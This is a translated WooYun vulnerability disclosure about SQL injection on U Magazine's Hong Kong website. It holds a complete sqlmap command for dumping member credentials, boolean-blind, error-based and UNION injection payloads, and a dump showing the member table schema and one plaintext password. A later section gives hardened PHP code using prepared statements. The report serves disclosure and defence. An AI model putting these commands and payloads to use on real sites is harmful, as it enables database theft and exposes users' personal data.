Vulnerability summary

Defect ID: wooyun-2015-0151441

Vulnerability title: SQL injection in U Magazine (107 tables / weak administrator password leaked) (Hong Kong)

Related vendor: U周刊

Reporter: 路人甲

Submitted: 2015-11-04 18:17

Fixed: 2015-12-22 13:10

Published: 2015-12-22 13:10

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: handed over to a third-party partner organization (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-04: Details sent to the vendor; awaiting vendor handling
2015-11-07: Vendor confirmed; details disclosed to the vendor only
2015-11-17: Details disclosed to core white hats and relevant domain experts
2015-11-27: Details disclosed to regular white hats
2015-12-07: Details disclosed to intern white hats
2015-12-22: Details disclosed to the public

Brief description:

U Magazine has been published for more than four years and enjoys a strong reputation. After receiving the APMA Best New Magazine in Asia award in 2007 (left), in April 2008 it went on to win two gold awards at the 7th Asia Media Awards 2008 (right): the Gold Award for Best Cover Design (magazine category) and the Gold Award for Best Feature Story (magazine category). This was U Magazine's first entry in the competition; the unique design of issue 100, "100% Tokyo", beat Singapore's I Weekly (silver) and TIME (bronze). Its "Hong Kong Architecture Series", which explored the transformation of public buildings into public space and six young people building their own homes, won the Gold Award for Best Feature Story. It was the only shortlisted Hong Kong magazine to win two gold awards. In 2009 U Magazine went on to receive another important Asia-wide award, the bronze award in the landscape category of the Asia Travel & Tourism Creative Awards "Best Travel Photography", a win of special significance to U Magazine.

Detailed description:

URL: http://**.**.**.**/event_result.php?event_pkey=142

python sqlmap.py -u "http://**.**.**.**/event_result.php?event_pkey=142" -p event_pkey --technique=BEU --random-agent --batch -D umagazine_v3 -T tbl_member -C login,password,name,mobile_tel,email --dump

Proof of vulnerability:

---
Parameter: event_pkey (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT
Type: UNION query
Title: MySQL UNION query (NULL) - 23 columns
Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] umagazine_v3
Database: umagazine_v3
[107 tables]
+-----------------------------------+
| tbl_ad |
| tbl_admin |
| tbl_badwords |
| tbl_badwords_bak |
| tbl_banner1 |
| tbl_banner1_item |
| tbl_banner2 |
| tbl_banner2_item |
| tbl_banner3 |
| tbl_banner3_item |
| tbl_banner4 |
| tbl_banner4_item |
| tbl_banner5 |
| tbl_banner5_item |
| tbl_cms_doc |
| tbl_cms_photo |
| tbl_contact |
| tbl_content |
| tbl_contents_book |
| tbl_contents_book_bak2 |
| tbl_contents_book_bak3 |
| tbl_contents_book_desc_photo |
| tbl_contents_book_desc_photo_bak |
| tbl_contents_book_desc_photo_bak2 |
| tbl_contents_book_desc_photo_bak3 |
| tbl_contents_book_pages |
| tbl_contents_book_pages_bak |
| tbl_contents_book_pages_bak2 |
| tbl_contents_book_pages_bak3 |
| tbl_contents_section |
| tbl_doclist |
| tbl_doclist_item |
| tbl_event |
| tbl_event_option |
| tbl_event_question |
| tbl_event_result |
| tbl_eventalbum |
| tbl_eventcontent |
| tbl_eventphoto |
| tbl_experts |
| tbl_forum |
| tbl_forum_badword |
| tbl_forum_group |
| tbl_forum_reply |
| tbl_forum_setting |
| tbl_forum_topic |
| tbl_forum_user_upload_photo |
| tbl_game |
| tbl_gameresult |
| tbl_gift |
| tbl_gift_option |
| tbl_gift_result |
| tbl_gift_winner |
| tbl_home |
| tbl_left_menu |
| tbl_link |
| tbl_member |
| tbl_member_20071026 |
| tbl_member_20080709 |
| tbl_member_bak |
| tbl_member_bookmark |
| tbl_member_forum |
| tbl_member_forum_20080709 |
| tbl_member_old |
| tbl_page |
| tbl_page_content |
| tbl_photo |
| tbl_photo_album_photo |
| tbl_photo_album_photo_cat |
| tbl_photo_poll |
| tbl_photo_poll_old |
| tbl_photo_poll_photo |
| tbl_photo_poll_photo_old |
| tbl_photo_rte |
| tbl_photo_sharing |
| tbl_photo_sharing_country |
| tbl_photo_sharing_country_group |
| tbl_photo_sharing_index |
| tbl_photo_sharing_setup |
| tbl_poll |
| tbl_pollingcontent |
| tbl_qna |
| tbl_story |
| tbl_story_country |
| tbl_story_country_group |
| tbl_story_setup |
| tbl_test |
| tbl_tips |
| tbl_tipscontent |
| tbl_uclub_promote |
| tbl_video |
| tbl_video_album_video |
| tbl_video_album_video_cat |
| tbl_video_country |
| tbl_video_country_group |
| tbl_video_item |
| tbl_vote |
| tbl_vote_ite |
| tbl_vote_main |
| tbl_vote_option |
| tbl_vote_photo |
| tbl_vote_photo_old |
| tbl_vote_topic |
| tbl_wallpaper |
| tbl_wallpaper_country |
| tbl_wallpaper_country_group |
| tbl_wallpaper_setup |
+-----------------------------------+
Database: umagazine_v3
Table: tbl_member
[56 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| version | int(11) |
| active | tinyint(1) |
| addr_area | varchar(50) |
| addr_block | varchar(50) |
| addr_building | varchar(100) |
| addr_district | varchar(100) |
| addr_estate | varchar(100) |
| addr_floor | varchar(50) |
| addr_room | varchar(50) |
| addr_street | varchar(100) |
| age | varchar(50) |
| chi_name | varchar(50) |
| dob | datetime |
| dob_d | int(11) |
| dob_m | int(11) |
| education | varchar(50) |
| email | varchar(50) |
| expense1 | varchar(50) |
| expense2 | varchar(50) |
| expense3 | varchar(50) |
| expense4 | varchar(50) |
| first_name | varchar(50) |
| hkid | varchar(50) |
| home_tel | varchar(50) |
| income_family | varchar(50) |
| income_personal | varchar(50) |
| internal_remark | text |
| is_email_list | tinyint(1) |
| is_email_list02 | tinyint(1) |
| is_wc | tinyint(1) |
| last_name | varchar(100) |
| login | varchar(50) |
| mobile_tel | varchar(50) |
| name | varchar(50) |
| occupation | varchar(50) |
| password | varchar(50) |
| pkey | int(11) |
| q1 | text |
| q2 | text |
| q3 | text |
| q4 | text |
| q5a | text |
| q5b | text |
| q5c | text |
| q5d | text |
| q5e | text |
| q5f | text |
| q5g | text |
| q5h | text |
| q6 | text |
| q7 | text |
| reg_date | datetime |
| sex | varchar(200) |
| tel | varchar(50) |
| title | varchar(10) |
| total_login | int(11) |
+-----------------+--------------+
Database: umagazine_v3
Table: tbl_member
[1 entry]
+---------+----------+---------+------------+---------+
| login | password | name | mobile_tel | email |
+---------+----------+---------+------------+---------+
| richard | 1234 | <blank> | <blank> | <blank> |
+---------+----------+---------+------------+---------+

Remediation:

Deploy a WAF.
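A WAF in front of event_result.php blocks known payload shapes, but the defect itself lives in how the page builds its SQL. The example below is added here as an illustration and is not U Magazine's code: the string-built query shape, the table name tbl_event_result and the PDO credentials are assumptions. It shows the assumed vulnerable shape next to a version that validates event_pkey as an integer and binds it through a prepared statement, written against the PHP 5.3 feature set the proof section reports.

```php
<?php
// Added illustrative example; not U Magazine's code. The query shape below is an
// assumption, as are the table name tbl_event_result and the PDO credentials.

// Vulnerable shape (assumed): the GET value is concatenated into the SQL text, so a
// value such as  142' AND 8553=8553 AND 'qUpz'='qUpz  becomes part of the query.
function buildResultQueryUnsafe($eventPkey)
{
    return "SELECT * FROM tbl_event_result WHERE event_pkey = '" . $eventPkey . "'";
}

// Hardened version: validate the type first, then bind the value as a parameter.
function fetchEventResults(PDO $db, $rawEventPkey)
{
    // event_pkey is a numeric key: accept only a plain positive integer.
    $eventPkey = filter_var($rawEventPkey, FILTER_VALIDATE_INT,
                            array('options' => array('min_range' => 1)));
    if ($eventPkey === false) {
        header('HTTP/1.1 400 Bad Request');
        return array();
    }
    // Prepared statement: the value is sent separately from the SQL text, so quotes,
    // AND/UNION keywords or a trailing '#' in the input cannot change the query.
    $stmt = $db->prepare('SELECT * FROM tbl_event_result WHERE event_pkey = :pkey');
    $stmt->bindValue(':pkey', $eventPkey, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection setup (placeholder credentials). Exceptions are enabled so that a failed
// query is logged server-side instead of echoing the MySQL error text to the visitor.
$db = new PDO('mysql:host=localhost;dbname=umagazine_v3', 'app_user', 'app_password',
              array(PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
                    PDO::ATTR_EMULATE_PREPARES => false));
try {
    $rawEventPkey = isset($_GET['event_pkey']) ? $_GET['event_pkey'] : '';
    $rows = fetchEventResults($db, $rawEventPkey);
} catch (PDOException $e) {
    error_log('event_result query failed: ' . $e->getMessage());
    header('HTTP/1.1 500 Internal Server Error');
    $rows = array();
}
```

Two details matter beyond the binding itself. Logging the exception instead of printing it removes the database error text that the error-based technique in the proof section depends on. And the dump shows the tbl_member password column holding the literal value 1234 in a varchar(50) field, alongside hkid, date of birth and home address columns, so the stored credentials should be replaced by salted password hashes rather than only protecting the query path.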

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 14

Confirmed: 2015-11-07 13:09

Vendor reply:

The incident has been reported to the relevant organization.

Latest status:

None